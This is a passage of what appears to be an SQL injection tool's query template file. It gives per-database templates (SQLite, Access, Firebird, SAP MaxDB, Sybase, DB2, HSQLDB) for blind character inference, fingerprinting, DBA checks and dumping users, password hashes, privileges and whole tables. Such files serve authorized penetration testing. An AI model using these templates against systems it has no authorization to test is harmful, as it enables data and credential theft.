condition2=\"OWNER\" condition3=\"TABLE_NAME\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"SQLite\">\n        <cast query=\"CAST(%s AS TEXT)\" dbms_version=\"&gt;=3.0\"/>\n        <!-- NOTE: On SQLite version 2 everything is stored as a string (Reference: http://www.mono-project.com/SQLite) -->\n        <length query=\"LENGTH(%s)\"/>\n        <isnull query=\"COALESCE(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"LIMIT %d,%d\"/>\n        <limitregexp query=\"\\s+LIMIT\\s+([\\d]+)\\s*\\,\\s*([\\d]+)\" query2=\"\\s+LIMIT\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" LIMIT \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\" query2=\"/*\"/>\n        <substring query=\"SUBSTR((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)\"/>\n        <hex query=\"HEX(%s)\"/>\n        <inference query=\"SUBSTR((%s),%d,1)>'%c'\"/>\n        <banner query=\"SELECT SQLITE_VERSION()\"/>\n        <current_user/>\n        <current_db/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba/>\n        <check_udf/>\n        <users/>\n        <passwords/>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <dbs/>\n        <tables>\n            <inband query=\"SELECT tbl_name FROM sqlite_master WHERE type='table'\"/>\n            <blind query=\"SELECT tbl_name FROM sqlite_master WHERE type='table' LIMIT %d,1\" count=\"SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='%s'\"/>\n            <blind query=\"SELECT sql FROM sqlite_master WHERE tbl_name='%s' LIMIT 1\" condition=\"\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s\"/>\n            <blind query=\"SELECT %s FROM %s LIMIT %d,1\" count=\"SELECT COUNT(*) FROM %s\"/>\n        </dump_table>\n        <search_db/>\n        <search_table>\n            <inband query=\"SELECT tbl_name FROM sqlite_master WHERE type='table' AND %s\" condition=\"tbl_name\" condition2=\"\"/>\n            <blind query=\"\" query2=\"SELECT tbl_name FROM sqlite_master WHERE type='table'\" count=\"\" count2=\"SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table'\" condition=\"tbl_name\" condition2=\"\"/>\n        </search_table>\n        <search_column/>\n    </dbms>\n\n    <dbms value=\"Microsoft Access\">\n        <cast query=\"RTRIM(CVAR(%s))\"/>\n        <length query=\"LEN(RTRIM(CVAR(%s)))\"/>\n        <isnull query=\"IIF(LEN(%s)=0,' ',%s)\"/>\n        <delimiter query=\"&amp;\"/>\n        <limit query=\"TOP %d\"/>\n        <limitregexp query=\"\\s+TOP\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"1\"/>\n        <limitstring query=\" TOP \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"%16\" query2=\"%00\"/>\n        <substring query=\"MID((%s),%d,%d)\"/>\n        <concatenate query=\"%s&amp;%s\"/>\n        <case query=\"SELECT (IIF(%s,1,0))\"/>\n        <inference query=\"ASCW(MID((%s),%d,1))>%d\"/>\n        <banner/>\n        <!--CURRENTUSER() is not available outside the MS Access query tool itself-->\n        <current_user/>\n        <current_db/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba/>\n        <dbs/>\n        <!--MSysObjects have no read permission by default-->\n        <tables>\n            <inband query=\"SELECT Name FROM MSysObjects WHERE Type=1\"/>\n            <blind query=\"SELECT MIN(Name) FROM MSysObjects WHERE Type=1 AND Name>'%s'\" count=\"SELECT COUNT(Name) FROM MSysObjects WHERE Type=1\"/>\n        </tables>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s\"/>\n            <blind query=\"SELECT MIN(%s) FROM %s WHERE CVAR(%s)>'%s'\" query2=\"SELECT TOP 1 %s FROM %s WHERE CVAR(%s) LIKE '%s'\" count=\"SELECT COUNT(*) FROM %s\" count2=\"SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s)\"/>\n        </dump_table>\n        <users/>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <search_db/>\n        <search_table/>\n        <search_column/>\n   </dbms>\n\n   <dbms value=\"Firebird\">\n        <cast query=\"TRIM(CAST(%s AS VARCHAR(10000)))\"/>\n        <length query=\"CHAR_LENGTH(TRIM(%s))\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"ROWS %d TO %d\"/>\n        <limitregexp query=\"\\s+ROWS\\s+([\\d]+)(\\s+TO\\s+([\\d]+))?\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" ROWS \"/>\n        <isnull query=\"COALESCE(%s,' ')\"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <comment query=\"--\"/>\n        <count query=\"COUNT(%s)\"/>\n        <substring query=\"SUBSTRING((%s) FROM %d FOR %d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT IIF(%s,1,0)\"/>\n        <inference query=\"ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1))>%d\" dbms_version=\"&gt;=2.1\" query2=\"SUBSTRING((%s) FROM %d FOR 1)>'%c'\"/>\n        <banner query=\"SELECT RDB$GET_CONTEXT('SYSTEM','ENGINE_VERSION') FROM RDB$DATABASE\" dbms_version=\"&gt;=2.1\"/>\n        <current_user query=\"SELECT CURRENT_USER FROM RDB$DATABASE\"/>\n        <current_db query=\"SELECT RDB$GET_CONTEXT('SYSTEM','DB_NAME') FROM RDB$DATABASE\"/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba query=\"CURRENT_USER='SYSDBA'\"/>\n        <users>\n            <inband query=\"SELECT RDB$USER FROM RDB$USER_PRIVILEGES\"/>\n            <blind query=\"SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES\" count=\"SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES\"/>\n        </users>\n        <tables>\n            <inband query=\"SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0)\"/>\n            <blind query=\"SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0)\" count=\"SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0)\"/>\n        </tables>\n        <privileges>\n            <inband query=\"SELECT RDB$USER,RDB$PRIVILEGE FROM RDB$USER_PRIVILEGES\" condition=\"RDB$USER\"/>\n            <blind query=\"SELECT FIRST 1 SKIP %d DISTINCT(RDB$PRIVILEGE) FROM RDB$USER_PRIVILEGES WHERE RDB$USER='%s'\" count=\"SELECT COUNT(DISTINCT(RDB$PRIVILEGE)) FROM RDB$USER_PRIVILEGES WHERE RDB$USER='%s'\"/>\n        </privileges>\n        <roles/>\n        <statements/>\n        <dbs/>\n        <columns>\n            <!--<inband query=\"SELECT r.RDB$FIELD_NAME,CASE f.RDB$FIELD_TYPE WHEN 261 THEN 'BLOB' WHEN 14 THEN 'CHAR' WHEN 40 THEN 'CSTRING' WHEN 11 THEN 'D_FLOAT' WHEN 27 THEN 'DOUBLE' WHEN 10 THEN 'FLOAT' WHEN 16 THEN 'INT64' WHEN 8 THEN 'INTEGER' WHEN 9 THEN 'QUAD' WHEN 7 THEN 'SMALLINT' WHEN 12 THEN 'DATE' WHEN 13 THEN 'TIME' WHEN 35 THEN 'TIMESTAMP' WHEN 37 THEN 'VARCHAR' ELSE 'UNKNOWN' END AS field_type FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'\"/>-->\n            <inband query=\"SELECT r.RDB$FIELD_NAME,f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'\" condition=\"r.RDB$FIELD_NAME\"/>\n            <blind query=\"SELECT r.RDB$FIELD_NAME FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'\" query2=\"SELECT f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s' AND r.RDB$FIELD_NAME='%s'\" count=\"SELECT COUNT(r.RDB$FIELD_NAME) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'\" condition=\"r.RDB$FIELD_NAME\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s\"/>\n            <blind query=\"SELECT FIRST 1 SKIP %d %s FROM %s\" count=\"SELECT COUNT(*) FROM %s\"/>\n        </dump_table>\n        <search_db/>\n        <search_table>\n            <inband query=\"SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0) AND %s\" condition=\"RDB$RELATION_NAME\" condition2=\"\"/>\n            <blind query=\"\" query2=\"SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0)\" count=\"\" count2=\"SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG=0)\" condition=\"RDB$RELATION_NAME\" condition2=\"\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT r.RDB$RELATION_NAME FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE %s\" condition=\"r.RDB$FIELD_NAME\" condition2=\"\" condition3=\"r.RDB$RELATION_NAME\"/>\n            <blind query=\"\" query2=\"SELECT DISTINCT(r.RDB$RELATION_NAME) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE %s\" count=\"\" count2=\"SELECT COUNT(DISTINCT(r.RDB$RELATION_NAME)) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE=f.RDB$FIELD_NAME WHERE %s\" condition=\"r.RDB$FIELD_NAME\" condition2=\"\" condition3=\"r.RDB$RELATION_NAME\"/>\n        </search_column>\n   </dbms>\n\n   <dbms value=\"SAP MaxDB\">\n        <length query=\"LENGTH(%s)\"/>\n        <isnull query=\"VALUE(%s,' ')\" query2=\"IFNULL(%s,' ')\"/>\n        <delimiter query=\",\"/>\n        <limit query=\"LIMIT %d,%d\"/>\n        <limitregexp query=\"\\s+LIMIT\\s+([\\d]+)\\s*\\,\\s*([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <!-- No real cast on SAP MaxDB -->\n        <cast query=\"REPLACE(CHR(%s),' ','_')\"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\" query2=\"#\"/>\n        <substring query=\"SUBSTR((%s),%d,%d)\"/>\n        <concatenate query=\"CONCAT(%s,%s)\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM VERSIONS\"/>\n        <hex query=\"HEX(%s)\"/>\n        <inference query=\"SUBSTR((%s),%d,1)>'%c'\"/>\n        <banner query=\"SELECT ID FROM SYSINFO.VERSION\"/>\n        <current_user query=\"SELECT USER() FROM VERSIONS\"/>\n        <current_db query=\"SELECT USER() FROM VERSIONS\"/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba query=\"EXISTS(SELECT USER_ID FROM domain.users WHERE username=USER() AND usermode='SYSDBA')\"/>\n        <users>\n            <inband query=\"SELECT username FROM domain.users\"/>\n            <blind query=\"SELECT MIN(username) FROM domain.users WHERE username>'%s'\" count=\"SELECT CHR(COUNT(*)) FROM domain.users\"/>\n        </users>\n        <columns>\n            <inband query=\"SELECT columnname,datatype,len FROM domain.columns WHERE tablename='%s' AND schemaname=%s\"/>\n            <blind/>\n        </columns>\n        <tables>\n            <inband query=\"SELECT tablename FROM domain.tables WHERE schemaname=%s AND type='TABLE'\"/>\n            <blind/>\n        </tables> \n        <dbs>\n            <inband query=\"SELECT DISTINCT(schemaname) FROM domain.tables\"/>\n            <blind/>\n        </dbs>\n        <roles>\n            <inband query=\"SELECT owner,role FROM domain.roles\" condition=\"owner\"/>\n            <blind/>\n        </roles>\n        <statements/>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s\"/>\n            <blind query=\"SELECT MIN(%s) FROM %s WHERE CHR(%s)>'%s'\" query2=\"SELECT MAX(%s) FROM %s WHERE CHR(%s) LIKE '%s'\" count=\"SELECT COUNT(*) FROM %s\" count2=\"SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS qq\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT schemaname FROM domain.tables WHERE %s\" condition=\"schemaname\"/>\n            <blind query=\"SELECT DISTINCT(schemaname) FROM domain.tables WHERE %s\" count=\"SELECT COUNT(DISTINCT(schemaname)) FROM domain.tables WHERE %s\" condition=\"schemaname\"/>\n        </search_db>\n   </dbms>\n\n    <dbms value=\"Sybase\">\n        <cast query=\"CONVERT(VARCHAR(4000),%s)\"/>\n        <length query=\"LTRIM(STR(LEN(%s)))\"/>\n        <isnull query=\"ISNULL(%s,' ')\"/>\n        <delimiter query=\"+\"/>\n        <limit query=\"SELECT TOP %d \"/>\n        <limitregexp query=\"TOP\\s+([\\d]+)\\s+.+?\\s+FROM\\s+.+?\\s+WHERE\\s+.+?\\s+NOT\\s+IN\\s+\\(SELECT\\s+TOP\\s+([\\d]+)\\s+\"/>\n        <limitgroupstart query=\"2\"/>\n        <limitgroupstop query=\"1\"/>\n        <limitstring/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\" query2=\"/*\"/>\n        <substring query=\"SUBSTRING((%s),%d,%d)\"/>\n        <concatenate query=\"%s+%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)\"/>\n        <hex query=\"BINTOSTR(CONVERT(VARBINARY,%s))\"/>\n        <inference query=\"ASCII(SUBSTRING((%s),%d,1))>%d\"/>\n        <banner query=\"SELECT @@VERSION\"/>\n        <current_user query=\"SELECT SUSER_NAME()\"/>\n        <current_db query=\"SELECT DB_NAME()\"/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba query=\"PATINDEX('%sa_role%',SHOW_ROLE())>0\" query2=\"EXISTS(SELECT * FROM master..syslogins,master..sysloginroles WHERE srid=0 and name='%s')\"/>\n        <users>\n            <inband query=\"SELECT name FROM master..syslogins\"/>\n            <blind/>\n        </users>\n        <passwords>\n            <inband query=\"SELECT name,password FROM master..syslogins\" condition=\"name\"/>\n            <blind/>\n        </passwords>\n        <privileges/>\n        <roles>\n            <inband query=\"SELECT name,srid FROM master..syslogins,master..sysloginroles\" condition=\"name\"/>\n            <blind/>\n        </roles>\n        <statements/>\n        <dbs>\n            <inband query=\"SELECT name FROM master..sysdatabases\"/>\n            <blind/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT name FROM %s..sysobjects WHERE type IN ('U')\"/>\n            <blind/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT %s..syscolumns.name,%s..syscolumns.usertype FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'\" condition=\"[DB]..syscolumns.name\"/>\n            <blind/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s.%s\"/>\n            <blind query=\"SELECT MIN(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s)>'%s'\" query2=\"SELECT MAX(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s) LIKE '%s'\" count=\"SELECT COUNT(*) FROM %s\" count2=\"SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS qq\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT name FROM master..sysdatabases WHERE %s\" condition=\"name\"/>\n            <blind/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT name FROM %s..sysobjects WHERE type IN ('U') AND \" condition=\"name\" condition2=\"name\"/>\n            <blind/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT %s..sysobjects.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id\" condition=\"[DB]..syscolumns.name\" condition2=\"[DB]..sysobjects.name\"/>\n            <blind/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"IBM DB2\">\n        <!-- Casting to varchar does not work with version < v9, so we had to use char(254) instead -->\n        <cast query=\"RTRIM(CAST(%s AS CHAR(254)))\"/>\n        <length query=\"LENGTH(RTRIM(CAST(%s AS CHAR(254))))\"/>\n        <isnull query=\"COALESCE(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"ROW_NUMBER() OVER () AS LIMIT %s) AS qq WHERE LIMIT\"/>\n        <limitregexp query=\"ROW_NUMBER\\(\\)\\s+OVER\\s+\\(\\)\\s+AS\\s+.+?\\s+FROM\\s+.+?\\)\\s+WHERE\\s+.+?\\s*=\\s*[\\d]+\"/>\n        <limitgroupstart/>\n        <limitgroupstop/>\n        <limitstring/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\"/>\n        <!-- TODO -->\n        <substring query=\"SUBSTR((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSIBM.SYSDUMMY1\"/>\n        <hex query=\"HEX(%s)\"/>\n        <inference query=\"SUBSTR((%s),%d,1)>'%c'\"/>\n        <!-- NOTE: We have to use the complicated UDB OLAP functions in query2 because sqlmap injects isnull query inside MAX function, else we would use: SELECT MAX(versionnumber) FROM sysibm.sysversions -->\n        <banner query=\"SELECT service_level FROM TABLE(sysproc.env_get_inst_info())\" query2=\"SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT,versionnumber FROM sysibm.sysversions) AS qq WHERE LIMIT=1\"/>\n        <current_user query=\"SELECT user FROM SYSIBM.SYSDUMMY1\"/>\n        <!-- NOTE: On DB2 we use the current user as default schema (database) -->\n        <current_db query=\"SELECT user FROM SYSIBM.SYSDUMMY1\"/>\n        <hostname query=\"SELECT host_name FROM TABLE(sysproc.env_get_sys_info())\"/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba query=\"(SELECT dbadmauth FROM syscat.dbauth WHERE grantee=current user)='Y'\"/>\n        <users>\n            <inband query=\"SELECT grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'\"/>\n            <blind query=\"SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS qq WHERE LIMIT=%d\" count=\"SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'\"/>\n        </users>\n        <!-- NOTE: On DB2 it is not possible to list password hashes, since they are handled by the OS -->        \n        <passwords/>\n        <privileges>\n            <inband query=\"SELECT grantee,RTRIM(tabschema)||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth\" condition=\"grantee\"/>\n            <blind query=\"SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS qq WHERE LIMIT=%d\" count=\"SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'\"/>\n        </privileges>\n        <roles/>\n        <statements/>\n        <!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->\n        <dbs>\n            <inband query=\"SELECT schemaname FROM syscat.schemata\"/>\n            <blind query=\"SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,schemaname FROM syscat.schemata) AS qq WHERE LIMIT=%d\" count=\"SELECT COUNT(schemaname) FROM syscat.schemata\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT tabschema,tabname FROM sysstat.tables\" condition=\"tabschema\"/>\n            <blind query=\"SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS qq WHERE LIMIT=INT('%d')\" count=\"SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT name,RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'\" condition=\"name\"/>\n            <blind query=\"SELECT name FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'\" query2=\"SELECT RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s' AND tbcreator='%s'\" count=\"SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'\" condition=\"name\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s\"/>\n            <blind query=\"SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,%s AS ENTRY_VALUE FROM %s) AS qq WHERE LIMIT=%d\" count=\"SELECT COUNT(*) FROM %s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT schemaname FROM syscat.schemata WHERE %s\" condition=\"schemaname\"/>\n            <blind query=\"SELECT schemaname FROM (SELECT DISTINCT(schemaname) FROM syscat.schemata WHERE %s) AS qq\" count=\"SELECT COUNT(DISTINCT(schemaname)) FROM syscat.schemata WHERE %s\" condition=\"schemaname\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT tabschema,tabname FROM sysstat.tables WHERE %s\" condition=\"tabname\" condition2=\"tabschema\"/>\n            <blind query=\"SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.tables WHERE %s) AS qq\" query2=\"SELECT DISTINCT(tabname) FROM sysstat.tables WHERE tabschema='%s'\" count=\"SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.tables WHERE %s\" count2=\"SELECT COUNT(tabname) FROM sysstat.tables WHERE tabschema='%s'\" condition=\"tabname\" condition2=\"tabschema\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT tabschema,tabname FROM sysstat.columns WHERE %s\" condition=\"colname\" condition2=\"tabschema\" condition3=\"tabname\"/>\n            <blind query=\"SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE %s) AS qq\" query2=\"SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'\" count=\"SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE %s\" count2=\"SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'\" condition=\"colname\" condition2=\"tabschema\" condition3=\"tabname\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"HSQLDB\">\n        <cast query=\"CAST(%s AS LONGVARCHAR)\"/>\n        <length query=\"CHAR_LENGTH(%s)\"/>\n        <isnull query=\"IFNULL(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"LIMIT %d %d\" query2=\"LIMIT %d OFFSET %d\"/>\n        <limitregexp query=\"\\s+LIMIT\\s+([\\d]+)\\s*\\,\\s*([\\d]+)\" query2=\"\\s+LIMIT\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" LIMIT \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\" query2=\"/*\" query3=\"//\"/>\n        <substring query=\"SUBSTR((%s),%d,%d)\"/>\n        <concatenate query=\"CONCAT(%s,%s)\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)\"/>\n        <!-- NOTE: RAWTOHEX() doesn't accept non-binary values -->\n        <!-- <hex query=\"RAWTOHEX(%s)\"/> -->\n        <inference query=\"ASCII(SUBSTR((%s),%d,1))>%d\"/>\n        <banner query=\"DATABASE_VERSION()\"/>\n        <current_user query=\"CURRENT_USER\"/>\n        <current_db query=\"DATABASE()\"/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba query=\"SELECT ADMIN FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE USER_NAME=CURRENT_USER\"/>\n        <check_udf/>\n        <users>\n            <!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->\n            <blind query=\"SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user\" count=\"SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS\"/>\n            <inband query=\"SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user\"/>\n        </users>\n        <passwords>\n            <!-- Passwords only shown in later versions &gt;=2.0  -->\n            <blind query=\"SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s' ORDER BY password_digest\" count=\"SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'\"/>\n            <inband query=\"SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user_name\" condition=\"user_name\"/>\n        </passwords>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <dbs>\n            <blind query=\"SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem\" count=\"SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS\"/>\n            <inband query=\"SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem\" />\n        </dbs>\n        <tables>\n            <blind query=\"SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' ORDER BY table_name\" count=\"SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'\"/>\n            <inband query=\"SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES ORDER BY table_schem\" condition=\"table_schem\"/>\n        </tables>\n        <columns>\n            <blind query=\"SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name\" query2=\"SELECT column_type FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schem='%s'\" count=\"SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'\" condition=\"column_name\"/>\n            <inband query=\"SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name\" condition=\"column_name\"/>\n        </columns>\n        <dump_table>\n            <blind query=\"SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d\" count=\"SELECT COUNT(*) FROM %s.%s\"/>\n            <inband query=\"SELECT %s FROM %s.%s ORDER BY %s\"/>\n        </dump_table>\n        <search_db>\n            <blind query=\"SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s\" count=\"SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s\" condition=\"table_schem\"/>\n            <inband query=\"SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s\" condition=\"table_schem\"/>\n        </search_db>\n        <search_table>\n            <blind query=\"SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s\" query2=\"SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'\" count=\"SELECT COUNT(DISTINCT(table_schem)) FROM 